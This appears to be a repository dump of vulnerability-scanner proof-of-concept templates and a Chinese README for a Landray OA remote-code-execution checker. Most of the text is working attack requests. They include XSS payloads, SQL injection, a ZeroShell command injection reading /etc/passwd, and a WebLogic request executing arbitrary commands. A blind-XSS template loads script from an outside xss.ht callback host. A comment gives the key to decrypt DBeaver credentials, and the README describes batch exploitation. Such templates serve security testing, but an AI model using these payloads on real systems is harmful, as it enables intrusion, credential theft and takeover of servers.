15 |       - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy
16 |     detections:
17 |       - >-
18 |         StatusCode() == 500 && RegexSearch("resBody", "Exception") && RegexSearch("resBody", "ObjectInputStream") && RegexSearch("resBody", "PersistentManagerBase")
19 | 
20 | references:
21 |   - https://www.cvebase.com/cve/2020/9484
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/header_blind_xss.yaml:
--------------------------------------------------------------------------------
 1 | id: header-blind-xss
 2 | 
 3 | info:
 4 |   name: Delivering blind xss payloads via headers
 5 |   author: panch0r3d
 6 |   severity: varies
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}"
12 |     redirects: true
13 |     max-redirects: 5
14 |     headers:
15 |       User-Agent: "Mozilla UACanary12345\'&#8211;><script src=https://XXXXX.xss.ht></script>"
16 |       Gibberish: "XFFCanary12345.{{Hostname}}'&#8211;><script src=https://XXXXX.xss.ht></script>"
17 |       Referer: "RFcanary12345.comRF'&#8211;><script src=https://XXXXX.xss.ht></script>"
18 |       Cookie: "CKCanary12345=qwertyCK'&#8211;><script src=https://XXXXX.xss.ht></script>"
19 |       Origin: "ORCanary12345.comOR'&#8211;><script src=https://XXXXX.xss.ht></script>"
20 | 


--------------------------------------------------------------------------------
/nuclei_pocs/php-timeclock-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: php-timeclock-xss
 2 | 
 3 | info:
 4 |   name: PHP Timeclock 1.04 XSS
 5 |   author: geeknik
 6 |   description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities
 7 |   reference: https://www.exploit-db.com/exploits/49853
 8 |   severity: medium
 9 |   tags: timeclock,xss
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=confirm%60xss%60%3E"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         part: header
20 |         words:
21 |           - "text/html"
22 |       - type: word
23 |         words:
24 |           - "'><svg/onload=confirm`xss`>"
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2009-0545.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2009-0545
 2 | 
 3 | info:
 4 |   name: ZeroShell <= 1.0beta11 Remote Code Execution
 5 |   author: geeknik
 6 |   description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
 7 |   reference: https://www.exploit-db.com/exploits/8023
 8 |   severity: critical
 9 |   tags: cve,cve2009,zeroshell,kerbynet,rce
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
15 | 
16 |     matchers:
17 |       - type: regex
18 |         part: body
19 |         regex:
20 |           - "root:[x*]:0:0:"
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2012-2371.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2012-2371
 2 | 
 3 | info:
 4 |   name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
 8 |   tags: cve,cve2012,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<img/src=x onerror=alert(123)>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-16670.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-16670
 2 | 
 3 | info:
 4 |   name: CirCarLife SCADA PLC Status
 5 |   description: PLC status disclosure due to lack of authentication
 6 |   reference:
 7 |     - https://www.exploit-db.com/exploits/45384
 8 |   author: geeknik
 9 |   severity: medium
10 |   tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
11 | 
12 | requests:
13 |   - method: GET
14 |     path:
15 |       - "{{BaseURL}}/services/user/values.xml?var=STATUS"
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: word
20 |         part: header
21 |         words:
22 |           - "CirCarLife Scada"
23 |       - type: word
24 |         part: body
25 |         words:
26 |           - "<values><variable><id>"
27 |           - "Reader.STATUS"
28 |         condition: and
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-6112.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-6112
 2 | info:
 3 |   name: Wordpress Sell Media XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       sell-media-search/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", 'id="sell-media-search-text" class="sell-media-search-text"') && StringSearch("resBody", "alert(1337)") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/6112
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2012-5913.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2012-5913
 2 | 
 3 | info:
 4 |   name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
 8 |   tags: cve,cve2012,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<ScrIpT>alert(123)</ScrIpT>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-12634.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-12634
 2 | 
 3 | info:
 4 |   name: Exposed CirCarLife System Log
 5 |   author: geeknik
 6 |   description: CirCarLife is an internet-connected electric vehicle charging station
 7 |   reference: https://circontrol.com/
 8 |   severity: medium
 9 |   tags: cve,cve2018,scada,circontrol,circarlife,logs
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/html/log"
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "CirCarLife Scada"
21 |       - type: word
22 |         words:
23 |           - "user.debug"
24 |           - "user.info"
25 |           - "EVSE"
26 |         condition: and
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-19985.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-19985
 2 | info:
 3 |   name: WordPress Plugin Email Subscribers & Newsletters Unauthenticated File Download
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       wp-admin/admin.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?page=download_report&report=users&status=all
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resHeaders", "Content-Disposition: attachment; filename=all-contacts.csv;") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/19985
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-20141.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-20141
 2 | info:
 3 |   name: Wordpress Laborator Neon Theme Reflected XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       data/autosuggest-remote.php
12 |       admin/data/autosuggest-remote.php
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?q=<img%20src=x%20onerror=alert(1)>
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StringSearch("resHeaders", "<img src=x onerror=alert(1)>") && StatusCode() != 301 && StatusCode() != 302
22 | references:
23 |   - https://www.cvebase.com/cve/2019/20141
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-2551.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-2551
 2 | info:
 3 |   name: Oracle Weblogic RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       console/login/LoginForm.jsp
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?value=*j%3Ch1%3Esample
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && ( StringSearch("resBody", "10.3.6.0") || StringSearch("resBody", "12.1.3.0") || StringSearch("resBody", "12.2.1.3") || StringSearch("resBody", "12.2.1.4"))
22 | references:
23 |   - https://www.cvebase.com/cve/2020/2551
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2011-5179.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2011-5179
 2 | 
 3 | info:
 4 |   name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
 8 |   tags: cve,cve2011,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-12461.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-12461
 2 | info:
 3 |   name: WebPort Reflected XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       log
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", '"</script><script>alert(document.domain);</script><script>')  && StringSearch("resHeaders", 'text/html')
21 | references:
22 |   - https://www.cvebase.com/cve/2019/12461
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-17506.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-17506
 2 | info:
 3 |   name: Artica Web Proxy SQLi
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         (StatusCode() == 200 || StatusCode() == 301 || StatusCode() == 302) && StringSearch("resHeaders", "PHPSESSID") && StringSearch("resBody", "artica-applianc")
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/17506
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2021-31581.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2021-31581
 2 | 
 3 | info:
 4 |   name: Akkadian Provisioning Manager MariaDB Credentials
 5 |   author: geeknik
 6 |   reference:
 7 |     - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
 8 |     - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
 9 |   severity: medium
10 |   tags: cve,cve2021,akkadian,mariadb,auth
11 | 
12 | requests:
13 |   - method: GET
14 |     path:
15 |       - "{{BaseURL}}/pme/database/pme/phinx.yml"
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: status
20 |         status:
21 |           - 200
22 |       - type: word
23 |         words:
24 |           - "host:"
25 |           - "name:"
26 |           - "pass:"
27 |         condition: and
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/remote-sync.yaml:
--------------------------------------------------------------------------------
 1 | id: remote-sync
 2 | 
 3 | info:
 4 |   name: Remote Sync for Atom credentials
 5 |   author: geeknik
 6 |   description: Created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials
 7 |   severity: high
 8 |   tags: atom,sftp,scp,ssh,ftp
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.remote-sync.json"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: word
21 |         part: header
22 |         words:
23 |           - "application/json"
24 |       - type: word
25 |         words:
26 |           - "Remote Sync"
27 |           - "hostname"
28 |           - "username"
29 |           - "password"
30 |         condition: and
31 | 


--------------------------------------------------------------------------------
/蓝凌OA未授权/README.md:
--------------------------------------------------------------------------------
 1 | # 蓝凌oa无回显rce漏洞
 2 | 
 3 | ## 声明
 4 | 
 5 | 本程序仅供于内部自查使用，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。
 6 | 
 7 | 
 8 | 
 9 | ## 目录列表
10 | 
11 | ![image-20220802091136108](READEME/image-20220802091136108.png)
12 | 
13 | 
14 | 
15 | ## 单个url检测
16 | 
17 | ```python
18 | python3 poc.py --url 单个域名
19 | ```
20 | 
21 | 
22 | 
23 | ## 批量url检测
24 | 
25 | ```python
26 | python3 poc.py --file url.txt
27 | ```
28 | 
29 | 
30 | 
31 | ## 效果图
32 | 
33 | ![image-20220802090521854](READEME/image-20220802090521854.png)
34 | 
35 | ## 说明
36 | 
37 | url.txt  放入蓝凌oa的ip列表
38 | shell.txt  检测后，脚本会自动把有漏洞的url写进同目录下shell.txt文件
39 | rce.py   经过测试，有些使用python脚本才可以得到返回值。所以如果当您用浏览器访问无法得到返回值时，可以调用python脚本去执行命令  //代理为 127.0.0.1:10808 自己修改代理即可
40 | 
41 | 您可以修改脚本中的命令进行替换![image-20220802091436656](READEME/image-20220802091436656.png)


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2011-4624.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2011-4624
 2 | 
 3 | info:
 4 |   name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
 8 |   tags: cve,cve2011,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2011-4926.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2011-4926
 2 | 
 3 | info:
 4 |   name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
 8 |   tags: cve,cve2011,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-2791.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-2791
 2 | info:
 3 |   name: Oracle WebCenter XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       servlet/Satellite
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "<h1xxx<scriptalert(1)</script") && StringSearch("resHeaders", 'text/html')
21 | references:
22 |   - https://www.cvebase.com/cve/2018/2791
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/dbeaver-credentials.yaml:
--------------------------------------------------------------------------------
 1 | id: dbeaver-credentials
 2 | 
 3 | info:
 4 |   name: DBeaver Credential Exposure
 5 |   author: geeknik
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/.dbeaver/credentials-config.json"
12 |     # to decode the above file, run this:
13 |     # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: word
21 |         words:
22 |           - "application/octet-stream"
23 |         part: header
24 |       - type: dsl
25 |         dsl:
26 |           - "len(body) >=200 && len(body) <400"
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/joomla-sqli-hdwplayer.yaml:
--------------------------------------------------------------------------------
 1 | id: joomla-sqli-hdwplayer-01
 2 | info:
 3 |   name: Joomla SQL Injection 01
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}/index.php"
 8 |   - sleep: '8'
 9 | 
10 | requests:
11 |   - method: POST
12 |     redirect: false
13 |     url: >-
14 |       {{.root}}
15 |     headers:
16 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
17 |       - Content-Type: application/x-www-form-urlencoded; charset=utf-8
18 |     body: |
19 |       option=com_hdwplayer&view=search&hdwplayersearch=')+AND+(SELECT+6495+FROM+(SELECT(SLEEP({{.sleep}})))IAul)--+vYqM
20 |     detections:
21 |       - >-
22 |         StatusCode() == 200 && ResponseTime() > {{.sleep}}
23 | 
24 | reference:
25 |   - link: https://www.exploit-db.com/exploits/48242


--------------------------------------------------------------------------------
/nuclei_pocs/wordpress-directory-listing.yaml:
--------------------------------------------------------------------------------
 1 | id: wordpress-directory-listing
 2 | info:
 3 |   name: Multiples Wordpress Directory Listing
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - vul: |
11 |       wp-includes/
12 |       wp-includes/images/
13 |       wp-content/
14 |       wp-content/uploads/
15 |       wp-content/themes/
16 |       wp-content/plugins/
17 |       wp-content/plugins/hustle/views/admin/dashboard/
18 |       wp-admin/
19 | requests:
20 |   - method: GET
21 |     redirect: false
22 |     url: >-
23 |       {{.root}}/{{.vul}}
24 |     headers:
25 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
26 |     detections:
27 |       - >-
28 |         StatusCode() == 200 && StringSearch("response", "Index of /")


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-16668.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-16668
 2 | 
 3 | info:
 4 |   name: CirCarLife SCADA Installation Paths
 5 |   description: System software installation path disclosure due to lack of authentication
 6 |   reference:
 7 |     - https://www.exploit-db.com/exploits/45384
 8 |   author: geeknik
 9 |   severity: medium
10 |   tags: cve,cve2018,circarlife,scada,iot,disclosure
11 | 
12 | requests:
13 |   - method: GET
14 |     path:
15 |       - "{{BaseURL}}/html/repository"
16 | 
17 |     matchers-condition: and
18 |     matchers:
19 |       - type: word
20 |         part: header
21 |         words:
22 |           - "CirCarLife Scada"
23 |       - type: word
24 |         part: body
25 |         words:
26 |           - "** Platform sources **"
27 |           - "** Application sources **"
28 |         condition: and
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-14882-2.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020–14882
 2 | info:
 3 |   name: Weblogic RCE GET request Probing — (CVE-2020–14882)
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   # use -p 'cmd=your_command'
 9 |   - cmd: 'whoami'
10 | 
11 | requests:
12 |   - method: GET
13 |     redirect: false
14 |     url: >-
15 |       {{.root}}//console/css/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('{{.cmd}}')")
16 |     detections: 
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", "wls.console") && StringSearch("resHeaders","ADMINCONSOLESESSION")
19 |   
20 | reference:
21 |   - link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf


--------------------------------------------------------------------------------
/nuclei_pocs/wp-finder-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: wp-finder-xss
 2 | 
 3 | info:
 4 |   name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://www.securityfocus.com/bid/55217/info
 8 |   tags: wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123);</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-22840.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2020-22840
 2 | 
 3 | info:
 4 |   name: b2evolution CMS Open redirect
 5 |   author: geeknik
 6 |   severity: low
 7 |   description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
 8 |   tags: cve,cve2020,redirect,b2evolution
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
14 | 
15 |     matchers:
16 |       - type: regex
17 |         regex:
18 |           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
19 |         part: header
20 | 


--------------------------------------------------------------------------------
/nuclei_pocs/chamilo-lms-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: chamilo-lms-xss
 2 | 
 3 | info:
 4 |   name: Chamilo LMS Cross Site Scripting
 5 |   author: geeknik
 6 |   severity: medium
 7 |   description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
 8 |   tags: xss,chamilo
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: body
19 |         words:
20 |           - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
21 |       - type: status
22 |         status:
23 |           - 200
24 |       - type: word
25 |         part: header
26 |         words:
27 |           - "text/html"
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/laravel-telescope.yaml:
--------------------------------------------------------------------------------
 1 | id: laravel-telescope
 2 | 
 3 | info:
 4 |   name: Laravel Telescope Disclosure
 5 |   author: geeknik
 6 |   description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more.
 7 |   reference: https://laravel.com/docs/8.x/telescope
 8 |   severity: medium
 9 |   tags: laravel,disclosure,logs
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/telescope/requests"
15 | 
16 |     redirects: true
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "<title>Telescope</title>"
21 |           - "Requests"
22 |           - "Commands"
23 |           - "Schedule"
24 |         condition: and
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/wp-knews-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: wp-knews-xss
 2 | 
 3 | info:
 4 |   name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://www.securityfocus.com/bid/54330/info
 8 |   tags: wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2011-4618.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2011-4618
 2 | 
 3 | info:
 4 |   name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
 8 |   tags: cve,cve2011,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<script>alert(123)</script>"
20 |         part: body
21 | 
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - text/html
26 | 
27 |       - type: status
28 |         status:
29 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2014-9094.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2014-9094
 2 | 
 3 | info:
 4 |   name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
 5 |   author: daffainfo
 6 |   severity: medium
 7 |   reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
 8 |   tags: cve,2014,wordpress,xss,wp-plugin
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
14 | 
15 |     matchers-condition: and
